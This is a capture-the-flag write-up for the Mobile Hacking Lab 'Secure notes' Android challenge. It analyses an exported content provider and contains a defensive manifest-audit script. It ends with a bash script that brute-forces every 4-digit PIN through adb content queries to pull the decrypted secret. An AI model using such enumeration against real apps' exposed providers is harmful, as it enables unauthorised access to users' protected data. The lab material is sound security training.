Secure notes
Hello everyone. In this blog post, I will try to explain my solution steps for the Secure notes challenge from the Mobile Hacking Lab platform. I hope it will be useful for you.
Let's examine the AndroidManifest.xml.
After that, I found 2 providers (com.mobilehackinglab.securenotes.secretprovider and androidx.startup.InitializationProvider) and 1 exported activity (MainActivity).
The MainActivity interacts with a content provider to validate a PIN and retrieve a secret value associated with that PIN. There is a listener set on submitPinButton: when it is clicked, the code calls the onCreate$lambda$0() function, which retrieves the text from pinEditText and then uses querySecretProvider to validate the entered PIN.
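The manifest review that opens this walkthrough can be scripted as a repeatable check. This is an added example, not code from the original post or from the challenge: it parses a decoded AndroidManifest.xml and lists exported components that no permission protects. The embedded manifest is constructed; only the component names come from the write-up, while the exported flags, authorities and intent filter are assumptions.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace
COMPONENTS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample. Component names come from the write-up; every attribute
# value (exported flags, authorities, intent filter) is an assumption.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.mobilehackinglab.securenotes">
  <application>
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <provider android:name=".SecretDataProvider" android:exported="true"
        android:authorities="com.mobilehackinglab.securenotes.secretprovider"/>
    <provider android:name="androidx.startup.InitializationProvider"
        android:exported="false" android:authorities="constructed.startup"/>
  </application>
</manifest>"""


def unguarded_access(comp, app_permission):
    """Access kinds on a component that no declared permission protects."""
    general = comp.get(A + "permission") or app_permission
    if comp.tag != "provider":
        return [] if general else ["launch"]
    kinds = {"read": "readPermission", "write": "writePermission"}
    return [k for k, attr in kinds.items() if not (comp.get(A + attr) or general)]


def audit_manifest(xml_text):
    """Return one finding per exported component that lacks a permission guard."""
    findings = []
    for app in ET.fromstring(xml_text).iter("application"):
        for comp in (c for c in app if c.tag in COMPONENTS):
            exported = comp.get(A + "exported")
            # No explicit flag: an intent filter implies exported (targetSdk <= 30).
            implicit = exported is None and comp.find("intent-filter") is not None
            open_kinds = unguarded_access(comp, app.get(A + "permission"))
            if (exported == "true" or implicit) and open_kinds:
                launcher = any(c.get(A + "name") == "android.intent.category.LAUNCHER"
                               for c in comp.iter("category"))
                findings.append({"type": comp.tag, "name": comp.get(A + "name"),
                                 "unguarded": open_kinds, "launcher": launcher})
    return findings
```

A launcher activity has to be exported, so the `launcher` field separates that expected finding from a provider whose read and write access are open to any caller.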
Let's analyze com.mobilehackinglab.securenotes.SecretDataProvider:
First of all, the correct PIN uses a key to decrypt the data stored in the config.properties file. Then let's keep going through the code:
It takes a query string.
It checks whether it is null and, if so, returns null.
If there is a value, it removes the prefix and then extracts the integer from it.
In the end it invokes decryptSecret().
If a valid cursor is returned and data is available, the code looks for a column named "Secret", expecting this to hold the result of the query.
Let's go back to the config.properties file and try to decrypt it manually.
Let's try to brute force the PIN and get the decrypted text:
```bash
#!/bin/bash

# Define the content provider URI
CONTENT_URI="content://com.mobilehackinglab.securenotes.secretprovider"

# Loop through all 4-digit PIN combinations (0000 to 9999)
for pin in $(seq -w 0000 9999); do
    echo "Trying PIN: $pin"

    # Use ADB to send the query command to the content provider
    adb shell content query --uri "$CONTENT_URI" --where "pin=$pin"

    # Check the output to see if it indicates a successful attempt
    # Assuming "Secret" is returned upon success, otherwise adjust the condition
    if adb shell content query --uri "$CONTENT_URI" --where "pin=$pin" | grep -q "Secret"; then
        echo "PIN found: $pin"
        break
    fi
done
```

